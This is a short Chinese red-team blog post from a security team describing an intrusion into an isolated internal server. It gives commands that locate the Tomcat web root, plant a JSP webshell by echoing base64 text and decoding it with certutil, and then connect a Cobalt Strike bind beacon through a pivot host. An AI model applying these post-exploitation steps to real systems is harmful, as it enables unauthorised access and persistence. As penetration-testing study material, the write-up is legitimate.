一次不出网上线cs实战案例
2022-7-21 17:7:17 Author: Tide安全团队(查看原文) 阅读量:19 收藏

shiro打点获取10段服务器权限,在10段机器出网且已上线cs;172段不出网且反向不通10段,已通过mysql弱口令获取system权限,存在web服务。

思路:写入webshell,通过正向马上线cs。

getshell

通过web服务获取一个web目录下的文件名:stf-login-bg.jpg

获取所有盘符

wmic logicaldisk get caption,name

通过文件名获取web目录

dir /a /s /b d:\"stf-login-bg.jpg"

根据图片URL确定D:\apache-tomcat-7.0.73-windows-x64\apache-tomcat-7.0.73\webapps\ROOT\static\images\login\stf-login-bg.jpg为真实web路径,使用\可dir到此路径。

echo配合certutil写入webshell:

//base64编码shell.jspcertutil -encode shell.jsp jsp.txt 
//echo编码后的内容到web目录echo xxxx >D:\\apache-tomcat-7.0.73-windows-x64\\apache-tomcat-7.0.73\\webapps\\ROOT\\static\\images\\login\\12.txt
//解码还原文件certutil -decode D:\\apache-tomcat-7.0.73-windows-x64\\apache-tomcat-7.0.73\\webapps\\ROOT\\static\\images\\login\\12.txt D:\\apache-tomcat-7.0.73-windows-x64\\apache-tomcat-7.0.73\\webapps\\ROOT\\static\\images\\login\\123.jsp

上线cs

新建监听器

生成正向马

通过webshell上传到目标机器并执行,使用跳板机连接,上线cs。

connect 172.20.57.122 28888

E

N

D

Tide安全团队正式成立于2019年1月,是新潮信息旗下以互联网攻防技术研究为目标的安全团队,团队致力于分享高质量原创文章、开源安全工具、交流安全技术,研究方向覆盖网络攻防、系统安全、Web安全、移动终端、安全开发、物联网/工控安全/AI安全等多个领域。

团队作为“省级等保关键技术实验室”先后与哈工大、齐鲁银行、聊城大学、交通学院等多个高校名企建立联合技术实验室,近三年来在网络安全技术方面开展研发项目60余项,获得各类自主知识产权30余项,省市级科技项目立项20余项,研究成果应用于产品核心技术研究、国家重点科技项目攻关、专业安全服务等。对安全感兴趣的小伙伴可以加入或关注我们。



文章来源: http://mp.weixin.qq.com/s?__biz=Mzg2NTA4OTI5NA==&mid=2247499610&idx=1&sn=06146cd3fa7483305c8d2d10b81fe053&chksm=ce5ddd3bf92a542d64286aa047195d9e29d45566c714e13b18a6660607aa5c7c0bacc0521801#rd
如有侵权请联系:admin#unsafe.sh